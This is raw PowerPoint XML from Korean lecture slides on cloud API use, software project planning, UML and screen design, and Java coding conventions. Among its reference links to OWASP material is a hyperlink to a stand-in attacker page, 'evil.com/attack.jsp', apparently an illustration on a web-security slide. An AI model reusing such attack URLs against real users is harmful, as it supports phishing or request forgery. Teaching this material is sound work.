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78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9" r:id="rId41"/>
    <p:sldId id="379" r:id="rId42"/>
    <p:sldId id="36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366" r:id="rId53"/>
    <p:sldId id="287" r:id="rId54"/>
    <p:sldId id="288" r:id="rId55"/>
    <p:sldId id="289" r:id="rId56"/>
    <p:sldId id="375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7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0" r:id="rId86"/>
    <p:sldId id="311" r:id="rId87"/>
    <p:sldId id="312" r:id="rId88"/>
    <p:sldId id="313" r:id="rId89"/>
    <p:sldId id="314" r:id="rId90"/>
    <p:sldId id="315" r:id="rId91"/>
    <p:sldId id="397" r:id="rId92"/>
    <p:sldId id="398" r:id="rId93"/>
    <p:sldId id="316" r:id="rId94"/>
    <p:sldId id="317" r:id="rId95"/>
    <p:sldId id="318" r:id="rId96"/>
    <p:sldId id="319" r:id="rId97"/>
    <p:sldId id="320" r:id="rId98"/>
    <p:sldId id="321" r:id="rId99"/>
    <p:sldId id="322" r:id="rId100"/>
    <p:sldId id="323" r:id="rId101"/>
    <p:sldId id="324" r:id="rId102"/>
    <p:sldId id="325" r:id="rId103"/>
    <p:sldId id="326" r:id="rId104"/>
    <p:sldId id="327" r:id="rId105"/>
    <p:sldId id="328" r:id="rId106"/>
    <p:sldId id="329" r:id="rId107"/>
    <p:sldId id="330" r:id="rId108"/>
    <p:sldId id="331" r:id="rId109"/>
    <p:sldId id="332" r:id="rId110"/>
    <p:sldId id="333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41" r:id="rId119"/>
    <p:sldId id="342" r:id="rId120"/>
    <p:sldId id="343" r:id="rId121"/>
    <p:sldId id="344" r:id="rId122"/>
    <p:sldId id="345" r:id="rId123"/>
    <p:sldId id="346" r:id="rId124"/>
    <p:sldId id="347" r:id="rId125"/>
    <p:sldId id="348" r:id="rId126"/>
    <p:sldId id="349" r:id="rId127"/>
    <p:sldId id="350" r:id="rId128"/>
    <p:sldId id="351" r:id="rId129"/>
    <p:sldId id="352" r:id="rId130"/>
    <p:sldId id="353" r:id="rId131"/>
    <p:sldId id="354" r:id="rId132"/>
    <p:sldId id="355" r:id="rId133"/>
    <p:sldId id="356" r:id="rId134"/>
    <p:sldId id="357" r:id="rId135"/>
    <p:sldId id="358" r:id="rId136"/>
    <p:sldId id="359" r:id="rId137"/>
    <p:sldId id="360" r:id="rId138"/>
    <p:sldId id="361" r:id="rId139"/>
    <p:sldId id="362" r:id="rId140"/>
    <p:sldId id="363" r:id="rId141"/>
    <p:sldId id="364" r:id="rId142"/>
    <p:sldId id="365" r:id="rId143"/>
    <p:sldId id="376" r:id="rId144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46"/>
      <p:bold r:id="rId147"/>
      <p:italic r:id="rId148"/>
      <p:boldItalic r:id="rId149"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Nanum Gothic Coding" panose="020B0600000101010101" charset="-127"/>
      <p:regular r:id="rId150"/>
      <p:bold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2" roundtripDataSignature="AMtx7mj90xLJN+qimZ9DjDpay5KpTAEJ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365274-C570-4AF8-8829-3F33A80F814F}">
  <a:tblStyle styleId="{1D365274-C570-4AF8-8829-3F33A80F8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102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6.fntdata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3322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43c8bf3e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143c8bf3e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c8bf3e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43c8bf3e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4AB0CF0-5081-47CA-9C09-826FE2061AD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42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c8bf3e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43c8bf3e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3c8bf3e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43c8bf3e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42fae9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42fae9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3c8bf3e0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143c8bf3e0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43c8bf3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143c8bf3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43c8bf3e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43c8bf3e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wiki.kr/w/%EC%8B%9C%ED%80%80%EC%8A%A4_%EB%8B%A4%EC%9D%B4%EC%96%B4%EA%B7%B8%EB%9E%A8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wiki.kr/w/ER_%EB%8B%A4%EC%9D%B4%EC%96%B4%EA%B7%B8%EB%9E%A8" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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avaguide.html" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://myeonguni.tistory.com/1596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acle.com/java/technologies/cc-java-programming-language.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/google/google-java-format" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/google/stylegui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sguide.html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hyperlink" Target="https://www.crockford.com/code.html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htmlcssguide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mages/b/bd/OWASP_Top_10-2017-ko.pdf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hyperlink" Target="https://owasp.org/www-pdf-archive/OWASP_Top_10-2017-ko.pdf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evil.com/attack.jsp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resource-naming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pring.io/projects/spring-security-oauth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m.co/spring-security-with-oauth2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ivis.kr/images/e/e9/2018_Unix_command_vi.pdf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yrasis.com/book/TheArtOfAmazonWebServices/Chapter1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ing.cafe24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firebase.google.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://webhosting.gabia.com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getting-started/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://youtu.be/Pv2yDJ2NKQ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%EB%82%98%EC%84%A0%ED%98%95_%EB%AA%A8%EB%8D%B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moa-blog.com/93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클라우드 API 활용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ko-KR"/>
              <a:t>김범준 강사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ko-KR"/>
              <a:t>2022년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네이버 클라우드 플랫폼 API 연동 사례</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="156" name="Google Shape;156;p8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="645975" y="3219449"/>
            <a:ext cx="7878198" cy="3032998"/>
            <a:chOff x="656203" y="3276602"/>
            <a:chExt cx="7878198" cy="3032998"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="157" name="Google Shape;157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6203" y="3276602"/>
              <a:ext cx="3933985" cy="303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90189" y="3276603"/>
              <a:ext cx="3944212" cy="30329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9649" y="2247899"/>
            <a:ext cx="3360624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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="248615" y="6446937"/>
            <a:ext cx="27222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https://www.ncloud.com/product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572" name="Google Shape;572;p76"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1381126"/>
            <a:ext cx="8229600" cy="474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800"/>
              <a:t>페르소나</a:t>
            </a:r>
            <a:endParaRPr sz="28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600"/>
              <a:t>가상의 사용자를 선정한다.</a:t>
            </a:r>
            <a:endParaRPr sz="16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600"/>
              <a:t>태도, 동기, 시나리오, 기능/컨텐츠, 이용형태</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="573" name="Google Shape;573;p76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="278814" y="6465987"/>
            <a:ext cx="3042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https://blog.rightbrain.co.kr/?p=6713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537" y="2741712"/>
            <a:ext cx="58769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580" name="Google Shape;580;p7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시나리오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/>
              <a:t>페르소나 별로 시나리오 작성.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="581" name="Google Shape;58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48983"/>
            <a:ext cx="3538531" cy="26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5336" y="3148983"/>
            <a:ext cx="3976689" cy="26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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238125" y="6463040"/>
            <a:ext cx="85153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https://m.blog.naver.com/PostView.naver?isHttpsRedirect=true&amp;blogId=opengine20&amp;logNo=10188260111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589" name="Google Shape;589;p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시장 조사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유사한 기존 제품이 있는지 밴치마킹.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기존 제품의 장,단점 분석.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타당성 검토</a:t>
            </a:r>
            <a:endParaRPr sz="20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비즈니스 모델</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a: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590" name="Google Shape;59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4508" y="3286126"/>
            <a:ext cx="4558480" cy="27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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238124" y="6373745"/>
            <a:ext cx="833437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https://www.kais99.org/jkais/journal/Vol18No03/Vol18No03p23.pdf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http://contents2.kocw.or.kr/KOCW/document/2018/soonchunhyang/leejoosung0117/8.pdf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4071939"/>
            <a:ext cx="26479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598" name="Google Shape;598;p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킥오프 미팅</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="599" name="Google Shape;599;p79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412137" y="6427887"/>
            <a:ext cx="40334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https://m.blog.naver.com/wishket/221615307386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3081336"/>
            <a:ext cx="28194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5613" y="2285999"/>
            <a:ext cx="3986687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607" name="Google Shape;607;p8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프로젝트 일정 표(간트차트)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프로젝트는 계획이 전체 일정의 반이다.</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="608" name="Google Shape;608;p80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="410669" y="6294537"/>
            <a:ext cx="25314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https://kun-hee.tistory.com/28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613" y="2714622"/>
            <a:ext cx="7129832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계획</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="615" name="Google Shape;615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팀 구성</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="616" name="Google Shape;61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0" y="3259933"/>
            <a:ext cx="3881438" cy="211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681290"/>
            <a:ext cx="3543300" cy="157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99" y="4708213"/>
            <a:ext cx="2552701" cy="164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팀 프로젝트 관리 도구 선정</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="624" name="Google Shape;624;p8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5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Git &amp; Github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구글 Keep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Notion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잔디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JIRA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Slack</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="625" name="Google Shape;62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0466" y="3400425"/>
            <a:ext cx="5524872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요구 분석</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="631" name="Google Shape;631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87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요구 사항 정의서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사용자의 요구 사항 이해</a:t>
            </a:r>
            <a:endParaRPr sz="20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고객의 문제의 실체를 파악하고 분석</a:t>
            </a:r>
            <a:endParaRPr sz="20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분석 모델 구축</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="632" name="Google Shape;632;p83"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="227776" y="6446937"/>
            <a:ext cx="2209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https://brunch.co.kr/@firstevan/6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50" y="3654022"/>
            <a:ext cx="4448175" cy="258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474182"/>
            <a:ext cx="3515857" cy="86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아키텍처 설계</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="640" name="Google Shape;640;p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개념 클래스 다이어그램</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="641" name="Google Shape;64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24" y="2305394"/>
            <a:ext cx="6256706" cy="363820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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="290350" y="6408837"/>
            <a:ext cx="223330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https://www.nextree.co.kr/p6753/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아키텍처 설계</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="648" name="Google Shape;648;p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유스케이스 다이어그램</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="649" name="Google Shape;64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918" y="2438398"/>
            <a:ext cx="4750112" cy="37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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="6462236"/>
            <a:ext cx="81343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http://dudmy.net/Softcone/2015/05/20/use-case-diagram/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네이버 클라우드 플랫폼 API 연동 사례</a:t>
            </a:r>
            <a:endParaRPr sz="28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2400"/>
              <a:t>지도 API 서비스</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167" name="Google Shape;167;p26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171241" y="6427887"/>
            <a:ext cx="2800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https://donggukice.tistory.com/19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882" y="2801552"/>
            <a:ext cx="4467017" cy="329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아키텍처 설계</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="656" name="Google Shape;656;p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시퀀스 다이어그램</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="657" name="Google Shape;65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225" y="2694856"/>
            <a:ext cx="5261186" cy="332494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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="6410325"/>
            <a:ext cx="83629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https://itwiki.kr/w/시퀀스_다이어그램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아키텍처 설계</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="664" name="Google Shape;664;p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E-R 다이어그램</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="665" name="Google Shape;66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6" y="3106123"/>
            <a:ext cx="3757297" cy="24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3475" y="3106124"/>
            <a:ext cx="3722484" cy="24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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285747" y="6423050"/>
            <a:ext cx="77438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https://itwiki.kr/w/ER_다이어그램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아키텍처 설계</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="673" name="Google Shape;673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클래스 다이어그램</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="674" name="Google Shape;674;p88"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="441349" y="6549167"/>
            <a:ext cx="349326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https://www.internetmap.kr/entry/UML-Best-Practices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588" y="2381250"/>
            <a:ext cx="58007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화면 설계</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="681" name="Google Shape;681;p89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94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사이트 맵</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="682" name="Google Shape;682;p89"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="460963" y="6370737"/>
            <a:ext cx="29642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http://newtypedesign.com/?p=4519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2543174"/>
            <a:ext cx="7295284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화면 설계</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="689" name="Google Shape;689;p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와이어 프레임</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="690" name="Google Shape;690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299" y="2370672"/>
            <a:ext cx="5737293" cy="3868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0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="473178" y="6418362"/>
            <a:ext cx="15872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https://yslab.kr/74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화면 설계</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="697" name="Google Shape;697;p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스토리 보드</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="698" name="Google Shape;69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4513" y="2366963"/>
            <a:ext cx="5537728" cy="383381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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="516722" y="6520592"/>
            <a:ext cx="25955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https://www.venturesquare.net/544639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/>
              <a:t>자바 코딩 가이드</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="705" name="Google Shape;705;p9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0. 코딩 가이드에 앞서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11" name="Google Shape;711;p9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2800">
                <a:latin typeface="Nanum Gothic Coding"/>
                <a:ea typeface="Nanum Gothic Coding"/>
                <a:cs typeface="Nanum Gothic Coding"/>
                <a:sym typeface="Nanum Gothic Coding"/>
              </a:rPr>
              <a:t>대소문자 케이스 타입(Case Types)</a:t>
            </a:r>
            <a:endParaRPr sz="2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낙타 표기법 camelCase: 다음 단어 첫글자는 대문자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파스칼 표기법 PascalCase: 모든 단어 첫글자는 대문자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뱀 표기법 snake_case. SNAKE_CASE: 단어 연결은 _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케밥 표기법 kebab-case: 단어 연결은 - (하이픈)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헝가리안 표기법 btnHungarianCase: btn은 button의 prefix접두어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1. 개발 프로세스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17" name="Google Shape;717;p94"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666750" y="1536633"/>
            <a:ext cx="81655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baseline="30000">
                <a:latin typeface="Nanum Gothic Coding"/>
                <a:ea typeface="Nanum Gothic Coding"/>
                <a:cs typeface="Nanum Gothic Coding"/>
                <a:sym typeface="Nanum Gothic Coding"/>
              </a:rPr>
              <a:t>소프트웨어 프로젝트는 다음의 프로세스를 권장합니다.</a:t>
            </a:r>
            <a:endParaRPr baseline="300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개발 요구사항 확인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클래스 추가/변경 설계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코딩, 테스팅, 로컬 QA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커밋, 풀 리퀘스트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코드 리뷰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통합 QA, 정적 분석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개발, 스테이지 테스트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운영 서버 배포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latin typeface="Nanum Gothic Coding"/>
                <a:ea typeface="Nanum Gothic Coding"/>
                <a:cs typeface="Nanum Gothic Coding"/>
                <a:sym typeface="Nanum Gothic Coding"/>
              </a:rPr>
              <a:t>필요시 롤백</a:t>
            </a:r>
            <a:endParaRPr sz="1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18" name="Google Shape;71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574" y="3457575"/>
            <a:ext cx="4910801" cy="29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2. 자바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24" name="Google Shape;724;p95"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657225" y="1536633"/>
            <a:ext cx="8175074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2000">
                <a:latin typeface="Dotum"/>
                <a:ea typeface="Dotum"/>
                <a:cs typeface="Dotum"/>
                <a:sym typeface="Dotum"/>
              </a:rPr>
              <a:t>자바 코딩 컨벤션은 구글 자바 스타일 가이드를 따릅니다.</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1">
              <a:latin typeface="Dotum"/>
              <a:ea typeface="Dotum"/>
              <a:cs typeface="Dotum"/>
              <a:sym typeface="Dotum"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="74295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ko-KR" sz="1400" b="1">
                <a:latin typeface="Dotum"/>
                <a:ea typeface="Dotum"/>
                <a:cs typeface="Dotum"/>
                <a:sym typeface="Dotum"/>
              </a:rPr>
              <a:t>구글 자바 스타일 가이드 :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" sz="1400"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ko-KR" sz="1400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Dotum"/>
                <a:ea typeface="Dotum"/>
                <a:cs typeface="Dotum"/>
                <a:sym typeface="Dotum"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://google.github.io/styleguide/javaguide.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" sz="1400">
                <a:latin typeface="Dotum"/>
                <a:ea typeface="Dotum"/>
                <a:cs typeface="Dotum"/>
                <a:sym typeface="Dotum"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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ko-KR" sz="1400">
                <a:latin typeface="Dotum"/>
                <a:ea typeface="Dotum"/>
                <a:cs typeface="Dotum"/>
                <a:sym typeface="Dotum"/>
              </a:rPr>
              <a:t>googlestyle: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" sz="1400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Dotum"/>
                <a:ea typeface="Dotum"/>
                <a:cs typeface="Dotum"/>
                <a:sym typeface="Dotum"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/google/styleguide</a:t>
            </a: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ko-KR" sz="1400">
                <a:latin typeface="Dotum"/>
                <a:ea typeface="Dotum"/>
                <a:cs typeface="Dotum"/>
                <a:sym typeface="Dotum"/>
              </a:rPr>
              <a:t>google-java-format : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" sz="1400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Dotum"/>
                <a:ea typeface="Dotum"/>
                <a:cs typeface="Dotum"/>
                <a:sym typeface="Dotum"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://github.com/google/google-java-format</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" sz="1400">
                <a:latin typeface="Dotum"/>
                <a:ea typeface="Dotum"/>
                <a:cs typeface="Dotum"/>
                <a:sym typeface="Dotum"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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196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ko-KR" sz="1400">
                <a:latin typeface="Dotum"/>
                <a:ea typeface="Dotum"/>
                <a:cs typeface="Dotum"/>
                <a:sym typeface="Dotum"/>
              </a:rPr>
              <a:t>오라클 Java 프로그래밍 언어의 코드 규칙:</a:t>
            </a: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/>
            </a:r>
            <a:b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</a:br>
            <a:r>
              <a:rPr lang="ko-KR" sz="1400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Dotum"/>
                <a:ea typeface="Dotum"/>
                <a:cs typeface="Dotum"/>
                <a:sym typeface="Dotum"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Code Conventions for the Java Programming Language (oracle.com)</a:t>
            </a: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196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74295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ko-KR" sz="1400">
                <a:latin typeface="Dotum"/>
                <a:ea typeface="Dotum"/>
                <a:cs typeface="Dotum"/>
                <a:sym typeface="Dotum"/>
              </a:rPr>
              <a:t>그 외 자바 코딩 규칙 참고: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" sz="1400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Dotum"/>
                <a:ea typeface="Dotum"/>
                <a:cs typeface="Dotum"/>
                <a:sym typeface="Dotum"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://myeonguni.tistory.com/1596</a:t>
            </a:r>
            <a:endParaRPr sz="14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네이버 클라우드 플랫폼 API 연동 사례</a:t>
            </a:r>
            <a:endParaRPr sz="28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2400"/>
              <a:t>Naver Search OpenAPI 활용</a:t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314323" y="6076145"/>
            <a:ext cx="87344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https://developers.naver.com/docs/search/tutorial/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https://developers.naver.com/docs/common/openapiguide/apilist.md#%EA%B2%80%EC%83%89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35" y="2894860"/>
            <a:ext cx="3481894" cy="282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211" y="2894860"/>
            <a:ext cx="3486911" cy="282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2. 자바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30" name="Google Shape;730;p96"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571501" y="1536633"/>
            <a:ext cx="82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파일명 : 탑 레벨 클래스명+.java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파일인코딩 : UTF-8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공백 : 스페이스(ASCII 0x20), 탭은 사용하지 않음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와일드카드 임포트(*)는 사용하지 않음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static 임포트 한 블록, non-static 임포트 한 블록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if, else, for, do, while 명령 뒤에는 반드시 중괄호 표시</a:t>
            </a:r>
            <a:endParaRPr sz="18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Kernighan and Ritchie style 중괄호 표시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6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여는 중괄호 앞에 줄바꿈 없음.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6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여는 중괄호 다음은 줄바꿈 있음.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6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닫는 중괄호 앞에 줄바꿈 있음.</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="222222"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="lt1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6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닫는 중괄호 다음에 줄바꿈 있음.</a:t>
            </a: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2. 자바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36" name="Google Shape;736;p97"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="590549" y="1450908"/>
            <a:ext cx="8162925" cy="183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내용없는 블록은 {} 로 표시하거나 2줄로 표시할 수 있음</a:t>
            </a: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예외: try/catch/finally 는 2줄로 표시</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Dotum"/>
              <a:ea typeface="Dotum"/>
              <a:cs typeface="Dotum"/>
              <a:sym typeface="Dotum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블록 들여쓰기 : 2 스페이스</a:t>
            </a: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한 줄에 한 문장(statement)만 사용. 세미콜론(;)으로 문장 종료</a:t>
            </a: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컬럼 폭 : 100 바이트</a:t>
            </a:r>
            <a:endParaRPr sz="16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737" name="Google Shape;737;p97"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1085850" y="3622818"/>
            <a:ext cx="7534274" cy="240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AFAFA"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>// 허용 됨</a:t>
            </a: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AFAFA"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>void doNothing() {}</a:t>
            </a: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85750" marR="0" lvl="0" indent="-209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AFAFA"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>// 이것 역시 허용 됨</a:t>
            </a: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AFAFA"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>void doNothingElse() {</a:t>
            </a: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5400" marR="254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AFAFA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25400" marR="254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38CD5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FE6D8"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>// 허용 되지 않음. 다중 블럭 명령문에 간결한 빈 블럭이 없음.</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="538CD5"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFE6D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FE6D8"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>try {</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none">
